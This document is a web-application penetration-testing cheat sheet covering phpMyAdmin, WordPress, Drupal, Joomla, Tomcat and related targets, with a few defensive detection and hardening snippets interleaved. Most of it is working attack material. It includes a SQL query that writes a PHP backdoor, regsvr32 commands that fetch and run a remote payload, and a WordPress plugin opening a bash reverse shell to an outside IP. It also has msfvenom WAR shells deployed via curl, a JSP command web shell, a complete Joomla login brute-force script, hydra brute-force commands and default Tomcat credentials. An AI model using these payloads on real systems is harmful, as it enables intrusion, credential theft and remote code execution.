CMS
JBOSS/JMX
python jexboss.py -host http://10.10.10.87:80
PHPMyAdmin
phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide
range of operations on MySQL and MariaDB. Frequently used operations (managing databases, tables, columns, relations, indexes, users,
permissions, etc.) can be performed via the user interface, while you still have the ability to directly execute any SQL statement.
Preparing the VM. First we have to change our config file C:\xampp\apache\conf\extra\httpd-xampp.conf and allow a remote user to access our
phpMyAdmin panel. To enable it we need to add "allow from 10.0.2.26" and:
<Directory "C:/xampp/">
AllowOverride AuthConfig Limit
Order allow,deny
Allow from all
Require all granted
</Directory>
After this our server is ready to be compromised.
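The block above exposes phpMyAdmin to every source address (and mixes Apache 2.2 `Order`/`Allow` syntax with 2.4 `Require`). As an added example, not from the original page, this is the restricted form: XAMPP's stock httpd-xampp.conf uses "Require local", and if remote administration is really needed only the admin host (10.0.2.26, the address used in the text) should be allowed.

```apache
# Hardened phpMyAdmin directory block for C:\xampp\apache\conf\extra\httpd-xampp.conf
# (added example; the directory path is XAMPP's default, the IP is the one used in the text)
<Directory "C:/xampp/phpMyAdmin">
    AllowOverride AuthConfig
    # Only the admin workstation may reach the panel; everyone else gets 403.
    # Use "Require local" instead if nobody needs remote access at all.
    Require ip 10.0.2.26
    ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var
</Directory>
```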
1. Go to the main XAMPP page,
2. Go to phpMyAdmin,
3. Create a new database,
4. Execute the SQL query: SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\backdoor.php" !! Remember to retype the "'" quote characters: pasted quotes in a different encoding cause an error.
5. We have now created a new PHP file in the main directory where the HTTP resources are stored.
6. As we can see, "http://10.0.2.10/backdoor.php" exists, so we can now interact with the victim machine.
7. http://10.0.2.10/backdoor.php?cmd=dir lists the contents of the directory where the PHP shell is stored.
8. Now run MSFCONSOLE.
9. We need to USE module exploits/multi/script/web_delivery.rb
IMPORTANT ! exploit/windows/misc/regsvr32_applocker_bypass_server is no longer valid. !
10. During configuration of the options remember to change the target:
msf exploit(multi/script/web_delivery) > show targets
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 PSH (Binary)
11. Execute command regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll using our PHP shell. Session is created.
The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system,
regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the
specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download
and execute) can occur on the same port.
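The regsvr32 chain described above leaves a distinctive process-creation trace: regsvr32.exe with an /i: argument pointing at a remote .sct and scrobj.dll, often spawned by the web server process when it was launched through a web shell. The following detection logic is an added example (not part of the original page); the event tuples are constructed to look like Sysmon event 1 fields.

```python
import re

# Constructed process-creation records (not from the original page):
# (parent image, image, command line), like Sysmon event 1 fields.
SAMPLE_EVENTS = [
    ("C:\\xampp\\apache\\bin\\httpd.exe", "C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /s /n /u /i:http://10.0.2.26:8080/file.sct scrobj.dll"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /s \"C:\\Program Files\\Vendor\\vendor.dll\""),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe",
     "REGSVR32.EXE /S /I:https://example.invalid/a.sct SCROBJ.DLL"),
]

# /i:<remote url> combined with scrobj.dll is the web_delivery regsvr32 chain
# described above. Matching is case-insensitive because regsvr32 accepts either case.
REMOTE_SCT = re.compile(r"/i:\s*(?:https?|ftp)://", re.IGNORECASE)
SCROBJ = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)
# Parents that should never launch regsvr32: a web shell such as the phpMyAdmin
# backdoor above runs its commands as the web server process.
WEB_SERVER_PARENTS = {"httpd.exe", "php.exe", "php-cgi.exe", "w3wp.exe"}


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(parent, image, cmdline):
    """Return the reasons this process event is suspicious ([] means benign)."""
    reasons = []
    if basename(image) != "regsvr32.exe":
        return reasons
    if REMOTE_SCT.search(cmdline) and SCROBJ.search(cmdline):
        reasons.append("regsvr32 loading a remote .sct scriptlet via scrobj.dll")
    if basename(parent) in WEB_SERVER_PARENTS:
        reasons.append("regsvr32 spawned by web server process " + basename(parent))
    return reasons


def scan(events):
    """Return [(command line, reasons)] for every suspicious event."""
    hits = []
    for parent, image, cmdline in events:
        reasons = classify(parent, image, cmdline)
        if reasons:
            hits.append((cmdline, reasons))
    return hits


for cmdline, reasons in scan(SAMPLE_EVENTS):
    print(cmdline, "->", "; ".join(reasons))
```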
Automatic scanners
nikto -h <URL>
python crawleet.py -u <URL> -b -d 3 -e jpg,png,css -f -m -s -x php,txt -y --threads 20
Wordpress
#Enumerate all themes, all users, and all plugins
wpscan --url http://192.168.1.103/wordpress/ -e at -e ap -e u
# Scan
wpscan --rua -e --url <URL>
# Brute force user(s)
wpscan --rua --url <URL> -P <PASSWORDS_LIST> -U "<USER>,<USER>"
# wordpress
wpscan --url http://.... --log
wpscan --url http://... --enumerate u --log
wpscan --url http://<targetip> --wordlist wordlist.txt --username example_username
http://....../wp-admin
http://...../wp-content/uploads/2017/10/file.png
#SSL/TLS
wpscan --disable-tls-checks --url $url
#Enumerate Users
wpscan --url [wordpress url] --enumerate u
#BruteForce User
wpscan --url <URL> -U oscar -P /usr/share/wordlists/rockyou.txt
wpscan --url <URL> -U creds.txt -P /usr/share/wordlists/rockyou.txt
Wordpress Plugin
#Enumerate all themes, all users, and all plugins
wpscan --url http://192.168.1.103/wordpress/ -e at -e ap -e u
wpscan --url https://192.168.240.148:12380/blogblog/ --plugins-detection passive
wpscan --url https://192.168.240.148:12380/blogblog/ --plugins-detection aggressive
#Vulnerable plugins
wpscan --url https://192.168.240.148:12380/blogblog/ -e vp
#All plugins
wpscan --url https://192.168.240.148:12380/blogblog/ -e ap
wpscan --url http://192.168.1.206:69 -e ap --plugins-detection aggressive
#All themes
wpscan --url https://192.168.240.148:12380/blogblog/ -e at
#Config backups
wpscan --url https://192.168.240.148:12380/blogblog/ -e cb
#Vulnerable themes
wpscan --url https://192.168.240.148:12380/blogblog/ -e vt
Wordpress Manual Enum:
#Plugin Directory
https://192.168.240.148:12380/blogblog/wp-content/plugins/
#Theme Directory
https://192.168.240.148:12380/blogblog/wp-content/themes/
Wordpress panel RCE
Modify a PHP file of the active theme (admin credentials needed)
Appearance -> Editor -> 404 Template (at the right)
Replace its content with a PHP shell
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://<IP>/wp-content/themes/twentytwelve/404.php
Wordpress WFuzz Plugins
wfuzz -c --hc=404 -w /SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt http://localhost/wp/FUZZ
WordPress NMAP
http-wordpress-brute.nse
http-wordpress-enum.nse
Plugin Reverse Shell
sudo rlwrap nc -lnvp 81
<?php
/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.86.99/81 0>&1'");
?>
zip reverse.zip ./reverse.php
Drupal
pip install droopescan
droopescan scan -u <URL>
Username enumeration
In /user/register just try to create a username; if the name is already taken you will be told:
*The name admin is already taken*
If you request a new password for an existing username:
*Unable to send e-mail. Contact the site administrator if the problem persists.*
If you request a new password for a non-existent username:
*Sorry, test is not recognized as a user name or an e-mail address.*
By accessing /user/<number> you can find the number of existing users:
- /user/1 -> Access denied (user exists)
- /user/2 -> Page not found (user doesn't exist)
Hidden pages enumeration
Fuzz /node/<NUMBER> where <NUMBER> is a number (from 1 to 500 for example).
You could find hidden pages (test, dev) which are not referenced by the search engines.
wfuzz -c -z range,1-500 --hc 404 <URL>/node/FUZZ
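Both the /user/<number> probing and the /node/<NUMBER> fuzzing above show up in the web server access log as one source walking sequential ids with mostly 403/404 responses. This detector is an added example (not from the original page); the log lines are constructed and cover both the clean-URL form and the /?q=user/ form used in the hydra command further down.

```python
import re
from collections import defaultdict

# One combined-log-format line; ip, path, status and user-agent are what the detector needs.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                     r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# /user/N and /node/N, in clean-URL form or the /?q=user/N form (clean URLs disabled).
PROBE_RE = re.compile(r"^/(?:\?q=)?(?P<kind>user|node)/(?P<id>\d+)$")


def _line(ip, path, status, ua, sec):
    return (f'{ip} - - [01/Jan/2024:10:00:{sec:02d} +0000] "GET {path} HTTP/1.1" '
            f'{status} 210 "-" "{ua}"')


# Constructed access log (not from the original page): 10.0.2.5 walks /user/1..12
# and fuzzes /?q=node/1..30; 10.0.2.7 is an ordinary visitor.
SAMPLE_LOG = (
    [_line("10.0.2.5", f"/user/{n}", 403 if n == 1 else 404, "curl/7.88.1", n) for n in range(1, 13)]
    + [_line("10.0.2.5", f"/?q=node/{n}", 200 if n in (1, 4, 17) else 404, "Wfuzz/3.1.0", n + 13)
       for n in range(1, 31)]
    + [_line("10.0.2.7", "/node/4", 200, "Mozilla/5.0", 9), _line("10.0.2.7", "/user/1", 403, "Mozilla/5.0", 10)]
)


def detect_enumeration(lines, threshold=10):
    """Flag source IPs that requested >= threshold distinct /user/N or /node/N ids."""
    per_ip = defaultdict(lambda: {"user": set(), "node": set(), "miss": 0, "total": 0, "ua": set()})
    for line in lines:
        m = LINE_RE.match(line)
        p = PROBE_RE.match(m["path"]) if m else None
        if not p:
            continue
        rec = per_ip[m["ip"]]
        rec[p["kind"]].add(int(p["id"]))
        rec["total"] += 1
        rec["miss"] += m["status"] in ("403", "404")   # enumeration is mostly misses
        rec["ua"].add(m["ua"])
    alerts = []
    for ip, rec in per_ip.items():
        for kind in ("user", "node"):
            ids = rec[kind]
            if len(ids) >= threshold:
                alerts.append({"ip": ip, "kind": kind, "distinct_ids": len(ids),
                               "id_range": (min(ids), max(ids)),
                               "miss_ratio": round(rec["miss"] / rec["total"], 2),
                               "agents": sorted(rec["ua"])})
    return alerts
```

A high miss ratio together with a tool user-agent separates this from a crawler that follows real links.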
Drupal panel RCE
The php module must be installed (check by requesting /modules/php: a 403 means it exists, a 404 means the php module isn't installed).
Go to Modules -> (Check) PHP Filter -> Save configuration
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
Then click Add content -> select Basic Page or Article -> paste the PHP shell code in the body -> select PHP code as Text format -> select Preview
Drupal Brute Force
## Drupal bruteforce attack
#crack the password of admin
site="192.168.230.147"
id=$(curl -s http://$site/user/|grep "form_build_id" |cut -d"\"" -f6)
hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt $site http-form-post "/?q=user/:name=^USER^&pass=^PASS^&form_id=user_login&form_build_id="$id":Sorry" -V
Joomla
joomscan -u <URL>
./joomlavs.rb --url <URL> -a -v
https://github.com/XiphosResearch/exploits/blob/master/Joomraa/joomraa.py
NMAP Joomla
http-joomla-brute.nse
Joomla BruteForce Script
#!/usr/bin/python3
#Example
#python3 joomla-brute.py -u http://192.168.159.79/joomla -w creds -usr admin -v
import requests
from bs4 import BeautifulSoup
import argparse
from urllib.parse import urlparse


class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


class Joomla():
    def __init__(self):
        self.initializeVariables()
        self.sendrequest()

    def initializeVariables(self):
        #Initialize args
        parser = argparse.ArgumentParser(description='Joomla login bruteforce')
        #required
        parser.add_argument('-u', '--url', required=True, type=str, help='Joomla site')
        parser.add_argument('-w', '--wordlist', required=True, type=str, help='Path to wordlist file')
        #optional
        parser.add_argument('-p', '--proxy', type=str, help='Specify proxy. Optional. http://127.0.0.1:8080')
        parser.add_argument('-v', '--verbose', action='store_true', help='Shows output.')
        #these two arguments should not be together
        group = parser.add_mutually_exclusive_group(required=True)
        group.add_argument('-usr', '--username', type=str, help='One single username')
        group.add_argument('-U', '--userlist', type=str, help='Username list')
        args = parser.parse_args()
        #parse args and save proxy as {scheme: host:port}, the form requests expects
        if args.proxy:
            parsedproxyurl = urlparse(args.proxy)
            self.proxy = {parsedproxyurl[0]: parsedproxyurl[1]}
        else:
            self.proxy = None
        #determine if verbose or not
        self.verbose = bool(args.verbose)
        #http:/site/administrator
        self.url = args.url + '/administrator/'
        self.ret = 'aW5kZXgucGhw'   # base64("index.php"), the login form's "return" field
        self.option = 'com_login'
        self.task = 'login'
        #Need cookie
        self.cookies = requests.session().get(self.url).cookies.get_dict()
        #Wordlist from args
        self.wordlistfile = args.wordlist
        self.username = args.username
        self.userlist = args.userlist

    def sendrequest(self):
        if self.userlist:
            for user in self.getdata(self.userlist):
                self.username = user.decode('utf-8')
                self.doGET()
        else:
            self.doGET()

    def doGET(self):
        for password in self.getdata(self.wordlistfile):
            #Custom user-agent :)
            headers = {
                'User-Agent': 'nano'
            }
            #First GET for CSRF: the last hidden input of the form is the per-session token
            r = requests.get(self.url, proxies=self.proxy, cookies=self.cookies, headers=headers)
            soup = BeautifulSoup(r.text, 'html.parser')
            longstring = (soup.find_all('input', type='hidden')[-1]).get('name')
            password = password.decode('utf-8')
            data = {
                'username': self.username,
                'passwd': password,
                'option': self.option,
                'task': self.task,
                'return': self.ret,
                longstring: 1
            }
            r = requests.post(self.url, data=data, proxies=self.proxy, cookies=self.cookies, headers=headers)
            soup = BeautifulSoup(r.text, 'html.parser')
            #Joomla renders a div.alert-message when the login fails
            response = soup.find('div', {'class': 'alert-message'})
            if response:
                if self.verbose:
                    print(f'{bcolors.FAIL} {self.username}:{password}{bcolors.ENDC}')
            else:
                print(f'{bcolors.OKGREEN} {self.username}:{password}{bcolors.ENDC}')
                break

    @staticmethod
    def getdata(path):
        #Read the file as bytes; callers decode each line
        with open(path, 'rb') as f:
            data = [line.rstrip() for line in f]
        return data


joomla = Joomla()
Joomla Authenticated RCE
https://www.hackingarticles.in/joomla-reverse-shell/
Tomcat
Default credentials
The most interesting path in Tomcat is /manager/html; there you can upload and deploy WAR files (i.e. execute code). This path is protected by HTTP basic auth, and the most common credentials are:
admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
NMAP
nmap -p8080 --script=tomcat-scan.nse 192.168.54.52
go-tomcat-mgmt-scanner
https://github.com/edermi/go-tomcat-mgmt-scanner
Brute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -f <IP> http-get /manager/html -vV -u
Tomcat panel RCE
# Generate payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
# Upload payload
Tomcat6 :
wget 'http://<USER>:<PASSWORD>@<IP>:8080/manager/deploy?war=file:shell.war&path=/shell' -O -
Tomcat7 and above :
curl -v -u <USER>:<PASSWORD> -T shell.war 'http://<IP>:8080/manager/text/deploy?path=/shell&update=true'
# Listener
nc -lvp <PORT>
# Execute payload
curl http://<IP>:8080/shell/
Tomcat-users.xml
/usr/share/tomcat9/etc/tomcat-users.xml
Read through a file-inclusion bug: http://megahosting.htb/news.php?file=../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
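The default credential list above and the tomcat-users.xml file are the two sides of the same weakness: a manager-capable user with a guessable password. As an added example (not from the original page), this audit parses tomcat-users.xml and reports users whose password is on the page's default list, empty or short, rated by whether they hold a role that reaches /manager; the XML is constructed.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml (not from the original page); the namespace is the
# one Tomcat 9 writes, and the code also accepts older files without it.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cr3t" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="Xk9!vQ2#pLm7wR4z" roles="manager-script"/>
  <user username="admin" password="" roles="manager-gui"/>
</tomcat-users>
"""

# The common pairs listed above; the audit logic itself is added here.
DEFAULT_CREDS = {("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
                 ("admin", "s3cr3t"), ("tomcat", "s3cr3t"), ("admin", "tomcat")}
# Roles that reach the manager / host-manager apps, i.e. WAR deployment.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                 "admin-gui", "admin-script"}


def audit(xml_text, min_length=12):
    """Return one finding per user: {'user', 'issues', 'manager_roles', 'severity'}."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.split("}")[-1] != "user":      # drop the xmlns prefix if present
            continue
        name, pw = el.get("username", ""), el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        issues = []
        if (name, pw) in DEFAULT_CREDS:
            issues.append("default credentials")
        if pw == "":
            issues.append("empty password")
        elif len(pw) < min_length:
            issues.append("short password")
        privileged = sorted(roles & MANAGER_ROLES)
        if issues and privileged:
            severity = "high"      # weak login that can deploy code through /manager
        elif issues:
            severity = "medium"
        elif privileged:
            severity = "info"      # deploy-capable, no credential weakness found
        else:
            continue
        findings.append({"user": name, "issues": issues,
                         "manager_roles": privileged, "severity": severity})
    return findings
```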
Uploading WebShell
script - cmdjsp.jsp
// note that linux = cmd and windows = "cmd.exe /c + cmd"
//https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmdjsp.jsp
<FORM METHOD=POST ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
    // parameter name must match the form field above
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            // Linux target: run the command directly (see the changes below)
            Process p = Runtime.getRuntime().exec(cmd);
            BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) {
                output += s + "\n";
            }
        }
        catch(IOException e) {
            e.printStackTrace();
        }
    }
%>
<pre>
<%=output %>
</pre>
Changes to Above Script
-------POST REQUEST is Cleaner-------
#old
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
#new
<FORM METHOD=POST ACTION='cmdjsp.jsp'>
-------change line 32 because we are going against Linux and not Windows-------
#old
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
#new
Process p = Runtime.getRuntime().exec(cmd);
Uploading with Curl
#create war file because tomcat does not know how to process .jsp
zip cmdjsp.war cmdjsp.jsp
curl -T cmdjsp.war -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/deploy?path=/app
It worked
WebDav
davtest -url <URL>
HTTP brute force authentication
HTTP basic authentication
# Hydra
hydra -l <USER> -V -P <PASSWORDS_LIST> -s 80 -f <IP> http-get /<URL_ENDPOINT>/ -t 15
# Patator
python patator.py http_fuzz auth_type=basic url=<URL> user_pass=FILE0 0=<USER:PASSWORD_LIST> -x ignore:code=401 -x ignore:code=307
HTTP GET request
hydra <IP> -V -l <USER> -P <PASSWORDS_LIST> http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t <THREADS_NUMBER>
HTTP POST request
hydra -l <USER> -P <PASSWORDS_LIST> <IP> http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t <THREADS_NUMBER>
Spidering / Brute force directories / files
gospider -d <DEPTHS> --robots --sitemap -t <THREADS> -s <URL>
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/FUZZ -e .php,.txt -t <THREADS>
dirbuster
Dictionaries :
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/dirb/big.txt
- /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Jenkins
https://github.com/gquere/pwn_jenkins